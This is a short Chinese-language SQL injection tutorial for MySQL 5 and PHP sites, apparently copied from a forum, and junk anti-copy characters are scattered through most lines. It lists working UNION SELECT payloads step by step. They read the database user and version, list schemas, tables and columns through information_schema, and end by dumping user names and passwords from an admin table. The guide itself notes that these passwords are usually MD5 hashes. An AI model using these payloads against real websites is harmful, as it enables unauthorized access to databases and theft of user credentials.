! l# _+ t1 {" F1 ? o7 ]! Y教程内容:Mysql 5+php 注入
# o: M! R; z8 S2 P3 j8 `& Y) B. a
8 P! P& C0 p6 L; o o# a# G' ?0 R" x Q( L3 |
4 T6 m/ w, B: E- e一.查看MYSQL基本信息(库名,版本,用户)+ I' ~/ ]& i6 ^
. |: e- x9 y8 X- i2 l
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*" ~0 H7 ~8 G$ F5 M
, R$ N$ s: m- K1 Z- _
二.查数据库
4 I2 L, H4 p7 K6 |9 v
7 d1 Q2 R! L# a1 E) cand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*3 [' r. m9 r2 e5 h& P# x6 Q
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。% ?3 E1 M5 T2 U. k2 C3 q1 @* D
3 R# d6 I2 {' j: C Q/ o
三.暴表
5 c2 a$ `& P6 w3 A8 u+ Y! j, I8 I) t: s9 K, b
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
0 _ }5 m% O I2 q9 E2 v; F
- |# l, K5 J2 x% U3 t1 C/ |7 mlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
% O# l5 j4 u) O- ]" {( C9 z) F
F6 z9 I6 b& M7 b* [0 c四.暴字段* j' `* U! D' ^$ F1 X2 I+ F4 e
2 @7 a! m/ R3 q3 d, M& c8 H
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*. u# T) a6 }: p1 G
: ]% Y& f! e, s; [
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
! T, k$ c+ C/ g% Z) {. X% n. ^
4 [- |! V% u/ [ ?& A/ i0 A$ P五.暴数据 G9 T& R9 R5 @% m l/ i
1 }8 H6 d3 ~+ ^3 f2 {and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*' O& p+ X! G' {2 w7 |# m: A3 K
. v- k0 U0 ~8 K: A9 W8 V( f- u4 z0 k2 T$ F; u2 o
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。+ D9 Z- `. N, k+ f7 `) ~
|